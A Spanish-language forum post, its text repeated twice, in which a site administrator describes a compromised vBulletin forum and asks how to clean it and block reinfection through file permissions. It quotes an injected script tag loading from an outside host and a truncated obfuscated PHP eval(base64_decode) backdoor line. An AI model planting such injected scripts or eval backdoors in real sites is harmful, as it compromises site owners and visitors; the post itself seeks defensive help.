- Desde
- 2 Ene 2008
- Mensajes
- 363
buenas un tema simple hace poco el foro que administro estaba bien, mas luego de dejarlo un tiempo a un amigo de pronto apareció un troyano añadido en la carpeta del servidor y afecta el foro
esto es mediante un código añadido que enlaza a varias pájinas por ahora a fenixmusica.com, y buscando info pues encontré esto:
Website Hacked Attack by iframe and index.php & gifimg.php base64_decode - Scammer Alert
Gifimg.php | Website Security
Ayer matamos a un virus-troyano desconocido que hemos llamado “Kytten” | Solosequenosenada
el código de vb está bien, pero lo que si es en cada carpeta del servidor donde está la carpeta del foro (/foro) se ha añadido el código
<script src=http://mojan.webphoto.ir/photos/ads-webphotos.php ></script>
y se ha creado un archivo llamado gifimg.php el cual buscando info indican que es un troyano,
incluso en varios códigos php se incluye
<?php eval(base64_decode(’aWYoIWlzc2V0 (BLABLABLA) RfUE9TVFsnZSddKSk7′)); ?>
lLo del (Blablabla) es un ejemplo, cómo eliminaría esa parte del eval¿???
lo mas simple es eliminarlo del servidor y todo bien, pero ahora la pregunta sería como hago para evitar de nuevo ese ataque osea permisos a la carpeta para evitar modifique, por ahora al momento de borrar el archivo lo normal es que tenga permiso:
644, que es: propietario, leer y editar - grupo, leer - publico, leer
ahora le estoy cambiando a
444, que es: propietario, leer - grupo, leer - publico, leer
y así cada vez que se deba editar solo lo pueda hacer manualmente y editando opciones creo así sería un medio para evitar de nuevo ese ataque, por cierto esto usando joomla me pasa lo mismo y otros script de pronto está contagiando al servidor
de hecho debo mandar un correo al servidor (godaddy) para que chequen ese tema, o es yo mismo quien generó ese problema o el servidor, por ahora qué me recomiendan hacer¿???
esto es mediante un código añadido que enlaza a varias pájinas por ahora a fenixmusica.com, y buscando info pues encontré esto:
Website Hacked Attack by iframe and index.php & gifimg.php base64_decode - Scammer Alert
Gifimg.php | Website Security
Ayer matamos a un virus-troyano desconocido que hemos llamado “Kytten” | Solosequenosenada
el código de vb está bien, pero lo que si es en cada carpeta del servidor donde está la carpeta del foro (/foro) se ha añadido el código
<script src=http://mojan.webphoto.ir/photos/ads-webphotos.php ></script>
y se ha creado un archivo llamado gifimg.php el cual buscando info indican que es un troyano,
incluso en varios códigos php se incluye
<?php eval(base64_decode(’aWYoIWlzc2V0 (BLABLABLA) RfUE9TVFsnZSddKSk7′)); ?>
lLo del (Blablabla) es un ejemplo, cómo eliminaría esa parte del eval¿???
lo mas simple es eliminarlo del servidor y todo bien, pero ahora la pregunta sería como hago para evitar de nuevo ese ataque osea permisos a la carpeta para evitar modifique, por ahora al momento de borrar el archivo lo normal es que tenga permiso:
644, que es: propietario, leer y editar - grupo, leer - publico, leer
ahora le estoy cambiando a
444, que es: propietario, leer - grupo, leer - publico, leer
y así cada vez que se deba editar solo lo pueda hacer manualmente y editando opciones creo así sería un medio para evitar de nuevo ese ataque, por cierto esto usando joomla me pasa lo mismo y otros script de pronto está contagiando al servidor
de hecho debo mandar un correo al servidor (godaddy) para que chequen ese tema, o es yo mismo quien generó ese problema o el servidor, por ahora qué me recomiendan hacer¿???
